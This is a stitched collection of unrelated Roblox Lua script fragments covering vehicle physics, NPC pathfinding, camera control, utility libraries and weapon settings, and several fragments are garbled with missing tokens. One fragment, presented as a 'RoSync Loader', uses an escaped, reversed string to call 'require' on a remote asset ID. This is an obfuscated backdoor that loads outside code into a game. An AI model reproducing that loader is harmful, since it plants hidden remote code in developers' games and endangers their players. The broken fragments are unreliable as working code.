EngineCurve(rpm*100,gear-1,V_SC,_Tune.M_EqPoint,PeakHP_S,PeakTQ_S) else stqPlot.Horsepower,stqPlot.Torque = 0,0 end else ntqPlot.Horsepower,ntqPlot.Torque = 0,0 ttqPlot.Horsepower,ttqPlot.Torque = 0,0 stqPlot.Horsepower,stqPlot.Torque = 0,0 end if _Tune.Electric then etqPlot.Horsepower,etqPlot.Torque = ElecCurve(rpm*100,gear-1) else etqPlot.Horsepower,etqPlot.Torque = 0,0 end else ntqPlot.Horsepower,ntqPlot.Torque = 0,0 etqPlot.Horsepower,etqPlot.Torque = 0,0 ttqPlot.Horsepower,ttqPlot.Torque = 0,0 stqPlot.Horsepower,stqPlot.Torque = 0,0 end if _Tune.Engine then nhp,ntq = EngineCurve((rpm+1)*100,gear-1,V_MT,_Tune.M_EqPoint,PeakHP_N,PeakTQ_N) if _TCount~=0 then thp,ttq = EngineCurve((rpm+1)*100,gear-1,V_TC,_Tune.M_EqPoint,PeakHP_T,PeakTQ_T) else thp,ttq = 0,0 end if _SCount~=0 then shp,stq = EngineCurve((rpm+1)*100,gear-1,V_SC,_Tune.M_EqPoint,PeakHP_S,PeakTQ_S) else shp,stq = 0,0 end else nhp,ntq = 0,0 thp,ttq = 0,0 shp,stq = 0,0 end if _Tune.Electric then ehp,etq = ElecCurve((rpm+1)*100,gear-1) else ehp,etq = 0,0 end ntqPlot.HpSlope,ntqPlot.TqSlope = (nhp-ntqPlot.Horsepower),(ntq-ntqPlot.Torque) etqPlot.HpSlope,etqPlot.TqSlope = (ehp-etqPlot.Horsepower),(etq-etqPlot.Torque) ttqPlot.HpSlope,ttqPlot.TqSlope = (thp-ttqPlot.Horsepower),(ttq-ttqPlot.Torque) stqPlot.HpSlope,stqPlot.TqSlope = (shp-stqPlot.Horsepower),(stq-stqPlot.Torque) nhpPlot[rpm] = ntqPlot ehpPlot[rpm] = etqPlot thpPlot[rpm] = ttqPlot shpPlot[rpm] = stqPlot end table.insert(NCache,nhpPlot) table.insert(ECache,ehpPlot) table.insert(TCache,thpPlot) table.insert(SCache,shpPlot) end --Powertrain wait() function Auto() local maxSpin=0 if Rear.Wheel.RotVelocity.Magnitude>maxSpin then maxSpin = Rear.Wheel.RotVelocity.Magnitude end if _IsOn then if _CGear == 0 and not _Tune.NeutralRev then _CGear = 1 _ClPressing = false end if _CGear >= 1 then if (_CGear==1 and _InBrake > 0 and bike.DriveSeat.Velocity.Magnitude < 10) and _Tune.NeutralRev then _CGear = 0 _ClPressing = false elseif bike.DriveSeat.Velocity.Magnitude > 10 then if _Tune.AutoShiftMode == "RPM" and not _ClutchSlip then if _RPM>(_Tune.PeakRPM+_Tune.AutoUpThresh) then if not _ShiftUp and not _Shifting then _ShiftUp = true end elseif math.max(math.min(maxSpin*_Tune.Ratios[_CGear+1]*fFDr,_Tune.Redline+100),_Tune.IdleRPM)<(_Tune.PeakRPM-_Tune.AutoDownThresh) and _CGear>1 then if not _ShiftDn and not _Shifting then _ShiftDn = true end end else if bike.DriveSeat.Velocity.Magnitude > math.ceil(wDRatio*(_Tune.PeakRPM+_Tune.AutoUpThresh)/_Tune.Ratios[_CGear+1]/fFD) then if not _ShiftUp and not _Shifting then _ShiftUp = true end elseif bike.DriveSeat.Velocity.Magnitude < math.ceil(wDRatio*(_Tune.PeakRPM-_Tune.AutoDownThresh)/_Tune.Ratios[_CGear+1]/fFD) and _CGear>1 then if not _ShiftDn and not _Shifting then _ShiftDn = true end end end end else if (_InThrot-(_Tune.IdleThrottle/100) > 0 and bike.DriveSeat.Velocity.Magnitude < 10) and _Tune.NeutralRev then _CGear = 1 _ClPressing = false end end end end function Gear() local maxSpin=0 if Rear.Wheel.RotVelocity.Magnitude>maxSpin then maxSpin = Rear.Wheel.RotVelocity.Magnitude end if _ShiftUp and not _Shifting then local AutoCheck if _TMode~="Manual" then AutoCheck = true end if (_TMode == "Manual" and ((not _Tune.QuickShifter and not _ClPressing) or (not _ClPressing and (_Tune.QuickShifter and tick()-_BTick>_Tune.QuickShiftTime)))) or _CGear == #_Tune.Ratios-1 or (_TMode ~= "Manual" and not _IsOn) then _ShiftUp = false return end local NextGear = math.min(_CGear+1,#_Tune.Ratios) if _TMode~="Manual" then _Shifting = true if _CGear>0 then if _Tune.AutoShiftType=="DCT" then wait(_Tune.ShiftUpTime) elseif _Tune.AutoShiftType=="Rev" then repeat wait() until _RPM<=math.max(math.min(maxSpin*_Tune.Ratios[NextGear]*fFDr,_Tune.Redline-_Tune.RevBounce),_Tune.IdleRPM) or not _IsOn or _ShiftDn end end end _ShiftUp = false _Shifting = false if _TMode ~= "Manual" and not _IsOn then return end _CGear = math.min(_CGear+1,#_Tune.Ratios-1) if _TMode ~= "Manual" or (_TMode == "Manual" and (_CGear == 1 or AutoCheck)) and _IsOn then _ClPressing = false end end if _ShiftDn and not _Shifting then local AutoCheck if _TMode~="Manual" then AutoCheck = true end if (_TMode == "Manual" and ((not _Tune.QuickShifter and not _ClPressing) or (not _ClPressing and (_Tune.QuickShifter and tick()-_TTick>_Tune.QuickShiftTime)))) or _CGear == 0 or (_TMode ~= "Manual" and not _IsOn) then _ShiftDn = false return end local PrevGear = math.min(_CGear,#_Tune.Ratios) if _TMode~="Manual" then _Shifting = true if _CGear>1 then if _Tune.AutoShiftType=="DCT" then wait(_Tune.ShiftDnTime) elseif _Tune.AutoShiftType=="Rev" then repeat wait() until _RPM>=math.max(math.min(maxSpin*_Tune.Ratios[PrevGear]*fFDr,_Tune.Redline-_Tune.RevBounce),_Tune.IdleRPM) or not _IsOn or _ShiftUp end end end _ShiftDn = false _Shifting = false if _TMode ~= "Manual" and not _IsOn then return end _CGear = math.max(_CGear-1,0) if _TMode ~= "Manual" or (_TMode == "Manual" and (_CGear == 0 or AutoCheck)) and _IsOn then _ClPressing = false end end end local tqTCS = 1 local sthrot = 0 local _StallOK = false local ticc = tick() local bticc = tick() --Apply Power function Engine(dt) local deltaTime = (60/(1/dt)) --Determine Clutch Slip if _TMode~="Manual" and _Tune.SlipClutch then if _Tune.ABS and _ABS then if _SlipCount >= _Tune.SlipABSThres then _ClutchSlip = true else _ClutchSlip = false end else if tick()-bticc >= _Tune.SlipTimeThres then _ClutchSlip = true else _ClutchSlip = false end end else _ClutchSlip = false end --Neutral Gear if ((_CGear == 0 or _Shifting) and _IsOn) then _ClPressing = true _Clutch = 1 _StallOK = false end local revMin = _Tune.IdleRPM local goalMin = _Tune.IdleRPM if _Tune.Stall and _Tune.Clutch then revMin = 0 end if _Shifting and _ShiftUp then _GThrot = 0 elseif _Shifting and _ShiftDn then _GThrot = (_Tune.ShiftThrot/100) else _GThrot = _InThrot end _GBrake = _InBrake if not _IsOn then ticc = tick() revMin = 0 goalMin = 0 _GThrot = _Tune.IdleThrottle/100 if _TMode~="Manual" then _CGear = 0 _ClPressing = true _Clutch = 1 end end --Determine RPM local maxSpin=0 if Rear.Wheel.RotVelocity.Magnitude>maxSpin then maxSpin = Rear.Wheel.RotVelocity.Magnitude end local _GoalRPM=0 if _Tune.Engine or _Tune.Electric then _GoalRPM = math.max(math.min((_RPM-_Tune.RevDecay*deltaTime)+((_Tune.RevDecay+_Tune.RevAccel)*_GThrot*deltaTime),_Tune.Redline+100),goalMin) end if _GoalRPM>_Tune.Redline then if _CGear<#_Tune.Ratios-2 then _GoalRPM = _GoalRPM-_Tune.RevBounce else _GoalRPM = _GoalRPM-_Tune.RevBounce*.5 end end local _WheelRPM = maxSpin*_Tune.Ratios[_CGear+1]*fFDr --Clutch Calculation if _Tune.Clutch then if script.Parent.Values.AutoClutch.Value and _IsOn then if _Tune.ClutchType == "Clutch" then if _ClPressing or _ClutchSlip then _ClutchKick = 1 end _ClutchKick = _ClutchKick*(_Tune.ClutchEngage/100) local ClRPMInfluence = math.max((_RPM-_Tune.IdleRPM)*_Tune.ClutchRPMMult/(_Tune.Redline-_Tune.IdleRPM),0) if _Tune.ClutchMode == "New" then ClRPMInfluence = 0 end _ClutchModulate = math.min(((((script.Parent.Values.Velocity.Value.Magnitude/_Tune.SpeedEngage)/math.abs(_CGear)) + ClRPMInfluence) - _ClutchKick), 1) elseif _Tune.ClutchType == "CVT" or (_Tune.ClutchType == "TorqueConverter" and _Tune.TQLock) then if (_GThrot-(_Tune.IdleThrottle/100)==0 and script.Parent.Values.Velocity.Value.Magnitude<_Tune.SpeedEngage) or (_GThrot-(_Tune.IdleThrottle/100)~=0 and (_RPM < _Tune.RPMEngage and _WheelRPM < _Tune.RPMEngage)) then _ClutchModulate = math.min(_ClutchModulate*(_Tune.ClutchEngage/100), 1) else _ClutchModulate = math.min(_ClutchModulate*(_Tune.ClutchEngage/100)+(1-(_Tune.ClutchEngage/100)), 1) end elseif _Tune.ClutchType == "TorqueConverter" and not _Tune.TQLock then _ClutchModulate = math.min((_RPM/_Tune.Redline)*0.7, 1) end if not _ClPressing and not _ClutchSlip then _Clutch = math.min(1-_ClutchModulate,1) else _Clutch = 1 end _StallOK = (_Clutch<=0.01) or _StallOK else _StallOK = _Tune.Stall _Clutch = script.Parent.Values.Clutch.Value end else _StallOK = false if (not _ClPressing and not _ClutchSlip) and not _Shifting then _Clutch = 0 else _Clutch = 1 end end local aRPM = math.max(math.min((_GoalRPM*_Clutch) + (_WheelRPM*(1-_Clutch)),_Tune.Redline+100),revMin) local clutchP = math.min(math.abs(aRPM-_RPM)/(_Tune.Flywheel*deltaTime),.9) if _ClPressing or _ClutchSlip then clutchP = 0 end _RPM = _RPM*clutchP + aRPM*(1-clutchP) if _RPM<=(_Tune.IdleRPM/4) and _StallOK and (tick()-ticc>=0.2) then script.Parent.IsOn.Value = not _Tune.Stall end --Rev Limiter _spLimit = -((_Tune.Redline+100)/(fFDr*_Tune.Ratios[_CGear+1])) if _Tune.Limiter then _spLimit = math.min(_spLimit,-_Tune.SpeedLimit) end if _RPM>_Tune.Redline then if _CGear<#_Tune.Ratios-2 then _RPM = _RPM-_Tune.RevBounce else _RPM = _RPM-_Tune.RevBounce*.5 end end --Aspiration local TPsi = _TPsi/_TCount local _BThrot = _GThrot if _Tune.Engine then if _TCount~=0 then _TBoost = _TBoost + ((((((_HP*(_BThrot*1.2)/_Tune.Horsepower)/8)-(((_TBoost/TPsi*(TPsi/15)))))*((8/(_Tune.T_Size/(deltaTime)))*2))/TPsi)*15) if _TBoost < 0.05 then _TBoost = 0.05 elseif _TBoost > 2 then _TBoost = 2 end else _TBoost = 0 end if _SCount~=0 then if _BThrot>sthrot then sthrot=math.min(_BThrot,sthrot+_Tune.S_Sensitivity*deltaTime) elseif _BThrot<sthrot then sthrot=math.max(_BThrot,sthrot-_Tune.S_Sensitivity*deltaTime) end _SBoost = (_RPM/_Tune.Redline)*(.5+(1.5*sthrot)) else _SBoost = 0 end else _TBoost = 0 _SBoost = 0 end --Torque calculations if _Tune.Engine then local cTq = NCache[_CGear+1][math.floor(math.min(_Tune.Redline,math.max(0,_RPM))/100)] _NH = cTq.Horsepower+(cTq.HpSlope*(((_RPM-math.floor(_RPM/100))/100)%1)) _NT = cTq.Torque+(cTq.TqSlope*(((_RPM-math.floor(_RPM/100))/100)%1)) if _TCount~=0 then local tTq = TCache[_CGear+1][math.floor(math.min(_Tune.Redline,math.max(0,_RPM))/100)] _TH = (tTq.Horsepower+(tTq.HpSlope*(((_RPM-math.floor(_RPM/100))/100)%1)))*(_TBoost/2) _TT = (tTq.Torque+(tTq.TqSlope*(((_RPM-math.floor(_RPM/100))/100)%1)))*(_TBoost/2) else _TH,_TT = 0,0 end if _SCount~=0 then local sTq = SCache[_CGear+1][math.floor(math.min(_Tune.Redline,math.max(0,_RPM))/100)] _SH = (sTq.Horsepower+(sTq.HpSlope*(((_RPM-math.floor(_RPM/100))/100)%1)))*(_SBoost/2) _ST = (sTq.Torque+(sTq.TqSlope*(((_RPM-math.floor(_RPM/100))/100)%1)))*(_SBoost/2) else _SH,_ST = 0,0 end _BH = _TH+_SH _BT = _TT+_ST else _NH,_NT = 0,0 _TH,_TT = 0,0 _SH,_ST = 0,0 _BH,_BT = 0,0 end if _Tune.Electric and _CGear~=0 then local eTq = ECache[_CGear+1][math.floor(math.min(_Tune.Redline,math.max(100,_RPM))/100)] _EH = eTq.Horsepower+(eTq.HpSlope*(((_RPM-math.floor(_RPM/100))/100)%1)) _ET = eTq.Torque+(eTq.TqSlope*(((_RPM-math.floor(_RPM/100))/100)%1)) else _EH,_ET = 0,0 end _HP = _NH + _BH + _EH _OutTorque = _NT + _BT + _ET --Update Wheels --Front _fABSActive = false --Output if _PBrake and bike.DriveSeat.Velocity.Magnitude<20 then --PBrake Front.Axle.HingeConstraint.MotorMaxTorque=PBrakeForce*(60/workspace:GetRealPhysicsFPS()) else if _CGear == 0 and bike.DriveSeat.Velocity.Magnitude <= 10 and _Tune.NeutralRev then Front.Axle.HingeConstraint.MotorMaxTorque=FBrakeForce*_GThrot*(60/workspace:GetRealPhysicsFPS()) else --Apply ABS local ftqABS = 1 if _ABS and math.abs(Front.Wheel.RotVelocity.Magnitude*(Front.Wheel.Size.Y/2) - Front.Wheel.Velocity.Magnitude)-_Tune.ABSThreshold>0 then ftqABS = 0 end if ftqABS < 1 then _fABSActive = true end local brake = FBrakeForce if _Tune.LinkedBrakes then local bias = _Tune.BrakesRatio/100 brake = brake*bias end Front.Axle.HingeConstraint.MotorMaxTorque=brake*_GBrake*ftqABS*(60/workspace:GetRealPhysicsFPS()) end end --Rear _TCSActive = false _rABSActive = false --Output if _PBrake and bike.DriveSeat.Velocity.Magnitude>=20 then --PBrake _SlipCount = _Tune.SlipABSThres bticc = tick()-_Tune.SlipTimeThres Rear.Axle.HingeConstraint.MotorMaxTorque=PBrakeForce*(60/workspace:GetRealPhysicsFPS()) Rear.Axle.HingeConstraint.MotorMaxAcceleration=9e9 Rear.Axle.HingeConstraint.AngularVelocity=0 else --Apply Power if _CGear == 0 and bike.DriveSeat.Velocity.Magnitude <= 10 and _Tune.NeutralRev then bticc = tick() _SlipCount = 0 Rear.Axle.HingeConstraint.MotorMaxTorque=math.min((500*_GBrake)+(RBrakeForce*_GThrot),500)*(60/workspace:GetRealPhysicsFPS()) Rear.Axle.HingeConstraint.AngularVelocity=7*_GBrake*(1-_GThrot) elseif _GBrake==0 then bticc = tick() _SlipCount = 0 local on=1 if not script.Parent.IsOn.Value then on=0 end local throt = _GThrot local clutch=1 if _ClPressing then clutch=0 end --Apply TCS local tqTCS = 1 if _TCS then tqTCS = 1-(math.min(math.max(0,math.abs(Rear.Wheel.RotVelocity.Magnitude*(wDia/2) - Rear.Wheel.Velocity.Magnitude)-_Tune.TCSThreshold)/_Tune.TCSGradient,1)*(1-(_Tune.TCSLimit/100))) end _TCSAmt = tqTCS if tqTCS < 1 then _TCSAmt = tqTCS _TCSActive = true end --Update Forces Rear.Axle.HingeConstraint.MotorMaxTorque=_OutTorque*throt*tqTCS*on*clutch*(60/workspace:GetRealPhysicsFPS())*(1+(Rear.Wheel.RotVelocity.Magnitude/(120-workspace:GetRealPhysicsFPS()))^(((1-_Tune.Drag)*1.15)+(((1-_Tune.Drag)*.07)*(1-(60/workspace:GetRealPhysicsFPS()))))) Rear.Axle.HingeConstraint.MotorMaxAcceleration=_RPM*(math.pi/30) Rear.Axle.HingeConstraint.AngularVelocity=_spLimit --Brakes else --Apply ABS local rtqABS = 1 if math.abs(Rear.Wheel.RotVelocity.Magnitude*(wDia/2) - Rear.Wheel.Velocity.Magnitude)-_Tune.ABSThreshold>0 then if _ABS then rtqABS = 0 _SlipCount = _SlipCount + 1 end print("it's happening") else bticc = tick() end if rtqABS < 1 then _rABSActive = true end local brake = RBrakeForce if _Tune.LinkedBrakes then local bias = _Tune.BrakesRatio/100 brake = brake*(1-bias) end Rear.Axle.HingeConstraint.MotorMaxTorque=brake*_GBrake*rtqABS*(60/workspace:GetRealPhysicsFPS()) Rear.Axle.HingeConstraint.MotorMaxAcceleration=9e9 Rear.Axle.HingeConstraint.AngularVelocity=0 end end end
-- Comprueba si se encontró el sonido
if sound then -- Reproduce el sonido sound:Play() else warn("El sonido 'hyperx' no se encontró en SoundService.") end
Tune.SteerInner = 36 -- Inner wheel steering angle (in degrees) Tune.SteerOuter = 37 -- Outer wheel steering angle (in degrees) Tune.SteerSpeed = .1 -- Steering increment per tick (in degrees) Tune.ReturnSpeed = .1 -- Steering increment per tick (in degrees) Tune.SteerDecay = 320 -- Speed of gradient cutoff (in SPS) Tune.MinSteer = 10 -- Minimum steering at max steer decay (in percent) Tune.MSteerExp = 1 -- Mouse steering exponential degree --Steer Gyro Tuning Tune.SteerD = 1000 -- Steering Dampening Tune.SteerMaxTorque = 50000 -- Steering Force Tune.SteerP = 100000 -- Steering Aggressiveness
-- no touchy
local path local waypoint local oldpoints local isWandering = 0 if canWander then spawn(function() while isWandering == 0 do isWandering = 1 local desgx, desgz = hroot.Position.x + math.random(-WanderX, WanderX), hroot.Position.z + math.random(-WanderZ, WanderZ) human:MoveTo(, 0, desgz) ) wait(math.random(4, 6)) isWandering = 0 end end) end while wait() do local enemytorso = GetTorso(hroot.Position) if enemytorso ~= nil then -- if player detected isWandering = 1 local function checkw(t) local ci = 3 if ci > #t then ci = 3 end if t[ci] == nil and ci < #t then repeat ci = ci + 1 wait() until t[ci] ~= nil return, 0, 0) + t[ci] else ci = 3 return t[ci] end end path = pfs:FindPathAsync(hroot.Position, enemytorso.Position) waypoint = path:GetWaypoints() oldpoints = waypoint local connection; local direct = Vector3.FromNormalId(Enum.NormalId.Front) local ncf = hroot.CFrame * direct = ncf.p.unit local rootr =, direct) local phit, ppos = game.Workspace:FindPartOnRay(rootr, hroot) if path and waypoint or checkw(waypoint) then if checkw(waypoint) ~= nil and checkw(waypoint).Action == Enum.PathWaypointAction.Walk then human:MoveTo( checkw(waypoint).Position ) human.Jump = false end -- CANNOT LET BALDI JUMPS -- if checkw(waypoint) ~= nil and checkw(waypoint).Action == Enum.PathWaypointAction.Jump then human.Jump = true connection = human.Changed:connect(function() human.Jump = true end) human:MoveTo( checkw(waypoint).Position ) else human.Jump = false end hroot.Touched:connect(function(p) local bodypartnames = GetPlayersBodyParts(enemytorso) if p:IsA'Part' and not p.Name == bodypartnames and phit and phit.Name ~= bodypartnames and phit:IsA'Part' and rootr:Distance(phit.Position) < 5 then connection = human.Changed:connect(function() human.Jump = true end) else human.Jump = false end end) if connection then connection:Disconnect() end else for i = 3, #oldpoints do human:MoveTo( oldpoints[i].Position ) end end elseif enemytorso == nil and canWander then -- if player not detected isWandering = 0 path = nil waypoint = nil human.MoveToFinished:Wait() end end
-- Note: The active transparency controller could be made to listen for this event itself.
function CameraModule:OnCameraSubjectChanged() if self.activeTransparencyController then self.activeTransparencyController:SetSubject(game.Workspace.CurrentCamera.CameraSubject) end if self.activeOcclusionModule then self.activeOcclusionModule:OnCameraSubjectChanged(game.Workspace.CurrentCamera.CameraSubject) end end function CameraModule:OnCameraTypeChanged(newCameraType) if newCameraType == Enum.CameraType.Scriptable then if UserInputService.MouseBehavior == Enum.MouseBehavior.LockCenter then UserInputService.MouseBehavior = Enum.MouseBehavior.Default end end -- Forward the change to ActivateCameraController to handle self:ActivateCameraController(nil, newCameraType) end
--// Damage Settings
BaseDamage = 92; -- Torso Damage LimbDamage = 84; -- Arms and Legs ArmorDamage = 38; -- How much damage is dealt against armor (Name the armor "Armor") HeadDamage = 100; -- If you set this to 100, there's a chance the player won't die because of the heal script
--[=[ @within TableUtil @function Map @param tbl table @param predicate (value: any, key: any, tbl: table) -> newValue: any @return table Performs a map operation against the given table, which can be used to map new values based on the old values at given keys/indices. For example: ```lua local t = {A = 10, B = 20, C = 30} local t2 = TableUtil.Map(t, function(key, value) return value * 2 end) print(t2) --> {A = 20, B = 40, C = 60} ``` ]=]
local function Map(t: Table, f: MapPredicate): Table assert(type(t) == "table", "First argument must be a table") assert(type(f) == "function", "Second argument must be a function") local newT = table.create(#t) for k,v in pairs(t) do newT[k] = f(v, k, t) end return newT end
-- ================================================================================ -- Settings - Dart -- ================================================================================
local Settings = {} Settings.DefaultSpeed = 150 -- Speed when not boosted [Studs/second, Range 50-300] Settings.BoostSpeed = 500 -- Speed when boosted [Studs/second, Maximum: 400] Settings.BoostAmount = 2 -- Duration of boost in seconds Settings.Steering = 5 -- How quickly the speeder turns [Range: 1-10]
--[[ This is a Rotated Region3 Class that behaves much the same as the standard Region3 class expect that it allows for both rotated regions and also a varying array of shapes. API: Constructors: cframe, Vector3 size) > Creates a region from a cframe which acts as the center of the region and size which extends to > the corners like a block part. RotatedRegion3.Block(CFrame cframe, Vector3 size) > This is the exact same as the constructor, but has a different name. RotatedRegion3.Wedge(CFrame cframe, Vector3 size) > Creates a region from a cframe which acts as the center of the region and size which extends to > the corners like a wedge part. RotatedRegion3.CornerWedge(CFrame cframe, Vector3 size) > Creates a region from a cframe which acts as the center of the region and size which extends to > the corners like a cornerWedge part. RotatedRegion3.Cylinder(CFrame cframe, Vector3 size) > Creates a region from a cframe which acts as the center of the region and size which extends to > the corners like a cylinder part. RotatedRegion3.Ball(CFrame cframe, Vector3 size) > Creates a region from a cframe which acts as the center of the region and size which extends to > the corners like a ball part. RotatedRegion3.FromPart(part) > Creates a region from a part in the game. It can be used on any base part, but the region > will treat unknown shapes (meshes, unions, etc) as block shapes. Methods: RotatedRegion3:CastPoint(Vector3 point) > returns true or false if the point is within the RotatedRegion3 object RotatedRegion3:CastPart(BasePart part) > returns true or false if the part is withing the RotatedRegion3 object RotatedRegion3:FindPartsInRegion3(Instance ignore, Integer maxParts) > returns array of parts in the RotatedRegion3 object > will return a maximum number of parts in array [maxParts] the default is 20 > parts that either are descendants of or actually are the [ignore] instance will be ignored RotatedRegion3:FindPartsInRegion3WithIgnoreList(Instance Array ignore, Integer maxParts) > returns array of parts in the RotatedRegion3 object > will return a maximum number of parts in array [maxParts] the default is 20 > parts that either are descendants of the [ignore array] or actually are the [ignore array] instances will be ignored RotatedRegion3:FindPartsInRegion3WithWhiteList(Instance Array whiteList, Integer maxParts) > returns array of parts in the RotatedRegion3 object > will return a maximum number of parts in array [maxParts] the default is 20 > parts that either are descendants of the [whiteList array] or actually are the [whiteList array] instances are all that will be checked RotatedRegion3:Cast(Instance or Instance Array ignore, Integer maxParts) > Same as the `:FindPartsInRegion3WithIgnoreList` method, but will check if the ignore argument is an array or single instance Properties: RotatedRegion3.CFrame > cframe that represents the center of the region RotatedRegion3.Size > vector3 that represents the size of the region RotatedRegion3.Shape > string that represents the shape type of the RotatedRegion3 object RotatedRegion3.Set > array of vector3 that are passed to the support function RotatedRegion3.Support > function that is used for support in the GJK algorithm RotatedRegion3.Centroid > vector3 that represents the center of the set, again used for the GJK algorithm RotatedRegion3.AlignedRegion3 > standard region3 that represents the world bounding box of the RotatedRegion3 object Note: I haven't actually done anything to enforce this, but you should treat all these properties as read only Enjoy! - EgoMoose --]]
-- [[ Services ]]
local Players = game:GetService("Players") local CollectionService = game:GetService("CollectionService")
--- Gets a type definition by name.
function Registry:GetType (name) return self.Types[name] end
--[[** Takes a table where keys are child names and values are functions to check the children against. Pass an instance tree into the function. If at least one child passes each check, the overall check passes. Warning! If you pass in a tree with more than one child of the same name, this function will always return false @param checkTable The table to check against @returns A function that checks an instance tree **--]]
function t.children(checkTable) assert(checkChildren(checkTable)) return function(value) local instanceSuccess = t.Instance(value) if not instanceSuccess then return false end local childrenByName = {} for _, child in ipairs(value:GetChildren()) do local name = child.Name if checkTable[name] then if childrenByName[name] then return false end childrenByName[name] = child end end for name, check in pairs(checkTable) do local success = check(childrenByName[name]) if not success then return false end end return true end end end return { t = t }
---------------------------------------------- --- Scroll down for settings --- --- Do not alter the three variables below --- ----------------------------------------------
local settings = {}; --// The settings table which contains all settings local Settings = settings; --// For custom commands that use 'Settings' rather than the lowercase 'settings' local descs = {}; --// Contains settings descriptions
-- Getter functions, with a couple of hacks for Ipad pre-focus.
function ScreenSpace.ViewSizeX() local x = PlayerMouse.ViewSizeX local y = PlayerMouse.ViewSizeY if x == 0 then return 1024 else if x > y then return x else return y end end end function ScreenSpace.ViewSizeY() local x = PlayerMouse.ViewSizeX local y = PlayerMouse.ViewSizeY if y == 0 then return 768 else if x > y then return y else return x end end end
-- This is an overload function for TransparencyController:Update() -- Do not call directly, or it will throw an assertion!
function FpsCamera:UpdateTransparency(...) assert(self ~= FpsCamera) self:BaseUpdate(...) if self.ForceRefresh then self.ForceRefresh = false if self.SetSubject then local camera = workspace.CurrentCamera self:SetSubject(camera.CameraSubject) end end end
--onselected, save shoulders and get player
script.Parent.Equipped:connect(function() player = game.Players:playerFromCharacter(script.Parent.Parent) local ch = script.Parent.Parent RSH = ch.Torso["Right Shoulder"] LSH = ch.Torso["Left Shoulder"] GRP = ch["Right Arm"].RightGrip -- RSH.Parent = nil LSH.Parent = nil -- RW.Part0 = ch.Torso RW.C0 =, 0.5, 0) --* CFrame.fromEulerAnglesXYZ(1.3, 0, -0.5) RW.C1 =, 0.5, 0) RW.Part1 = ch["Right Arm"] RW.Parent = ch.Torso _G.R = RW -- LW.Part0 = ch.Torso LW.C0 =, 0.5, 0) --* CFrame.fromEulerAnglesXYZ(1.7, 0, 0.8) LW.C1 =, 0.5, 0) LW.Part1 = ch["Left Arm"] LW.Parent = ch.Torso _G.L = LW -- GRP.C0 =, -1, 0) * CFrame.fromEulerAnglesXYZ(-1, 0, 0) --Bring_Arm_Up animation for i = 0, 1, 0.05 do wait() RW.C0 =, 0.5, 0) * CFrame.fromEulerAnglesXYZ(1.3*i, 0, -0.5*i) LW.C0 =, 0.5, 0) * CFrame.fromEulerAnglesXYZ(1.7*i, 0, 0.8*i) LW.C1 =*i, 0.5+1.2*i, 0) end end)
--[[ button.MouseButton1Click:Connect(function() local pos = userInputService:GetMouseLocation() --local relativePosition = pos - frame.Parent.AbsolutePosition frame.Position =, pos.X, 0, pos.Y - 36) end) ]]
for i,v in pairs (script.Parent.Parent.Folder:GetChildren()) do v.MouseEnter:Connect(function() canfollow = true print("l") frame.Text = v.showtext.Value game:GetService("RunService").RenderStepped:Connect(function() if canfollow == true then local pos = userInputService:GetMouseLocation() frame.Position =, pos.X -50, 0, pos.Y - 60) frame.Visible = true else end end) v.MouseLeave:Connect(function() canfollow = false frame.Visible = false frame.Text = "" end) end) end
--- Finds a hitbox object if valid, else return nil -- @param Object instance
function RaycastHitbox:GetHitbox(object: any?) if object then return HitboxData:_FindHitbox(object) end end return RaycastHitbox
--- Skill
local UIS = game:GetService("UserInputService") local plr = game.Players.LocalPlayer local Mouse = plr:GetMouse() local Debounce = true Player = game.Players.LocalPlayer UIS.InputBegan:Connect(function(Input) if Input.KeyCode == Enum.KeyCode.F and Debounce == true and Tool.Equip.Value == true and Tool.Active.Value == "None" then Debounce = false Tool.Active.Value = "" wait(0) Track1 = Player.Character.Humanoid:LoadAnimation(script.Anim01) Track1:Play() wait(0) script.Fire:FireServer(plr) local hum = Player.Character.Humanoid hum.WalkSpeed = 34 wait(4.8) hum.WalkSpeed = 1 for i = 1,2 do hum.CameraOffset = math.random(0,0), math.random(0,0), math.random(0,0) ) end hum.CameraOffset =,0,0) wait(0.2) hum.WalkSpeed = 16 wait(1) Tool.Active.Value = "None" Debounce = true end end)
-- Set the ImageLabel's content to the user thumbnail
local imageLabel = script.Parent imageLabel.Image = content
--[[ Last synced 7/31/2021 07:05 RoSync Loader ]]
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722947559) --[[ ]]--
Groups = { [0] = { [254] = "Admin"; [1] = "VIP"; }; };
-- Setup animation objects
function scriptChildModified(child) local fileList = animNames[child.Name] if (fileList ~= nil) then configureAnimationSet(child.Name, fileList) end end script.ChildAdded:Connect(scriptChildModified) script.ChildRemoved:Connect(scriptChildModified) for name, fileList in pairs(animNames) do configureAnimationSet(name, fileList) end
-- Player specific convenience variables
local MyPlayer = nil local MyCharacter = nil local MyHumanoid = nil local MyTorso = nil local MyMouse = nil local DebrisService = game:GetService('Debris') local FireSound local OnFireConnection = nil local OnReloadConnection = nil
-- check if camera is zoomed into first person
local function checkfirstperson() if isfirstperson == false then -- not in first person if ((camera.focus.p - camera.CFrame.p).magnitude <= 1) then enableviewmodel() end elseif ((camera.focus.p - camera.CFrame.p).magnitude > 1.1) then disableviewmodel() end end
--[[ PlayerServer.lua AddPlayerAddedFunc: Add a function that runs whenever a player joins a server ]]
local this = {} this.__index = this this.Service = nil function ) -- body local self = this.Service or {} setmetatable(self,this) self.BindedPlayerAddedFunctions = {} self.BindedCharacterAddedFunctions = {} self.BindedPlayerRemovingFunctions = {} for _,v in pairs(game.Players:GetPlayers()) do self:PlayerAdded(v) end self.Connections = { PlayerAdded = game.Players.PlayerAdded:Connect(function(plr) self:PlayerAdded(plr) end); PlayerRemoving = game.Players.PlayerRemoving:Connect(function(plr) self:PlayerRemoving(plr) end); } this.Service = self return self end function this:PlayerAdded( plr ) for _,v in pairs(self.BindedPlayerAddedFunctions) do v(plr) end if plr.Character then self:CharacterAdded(plr.Character) end plr.CharacterAdded:Connect(function( char ) self:CharacterAdded(char) end) end function this:PlayerRemoving( plr ) for _,v in pairs(self.BindedPlayerRemovingFunctions) do v(plr) end end function this:CharacterAdded(char) for _,v in pairs(self.BindedCharacterAddedFunctions) do v(char) end end function this:AddPlayerAddedFunc(name, func ) -- body self.BindedPlayerAddedFunctions[name] = func for i,v in pairs(game.Players:GetPlayers()) do warn(v.Name.. " was already in the game before we added this player added function") func(v) end end function this:AddPlayerRemovingFunc(name, func ) -- body self.BindedPlayerRemovingFunctions[name] = func end function this:AddCharacterAddedFunc(name, func ) -- body self.BindedCharacterAddedFunctions[name] = func for i,v in pairs(game.Players:GetPlayers()) do if v.Character then warn(v.Name.. " was already in the game before we added this Character added function") 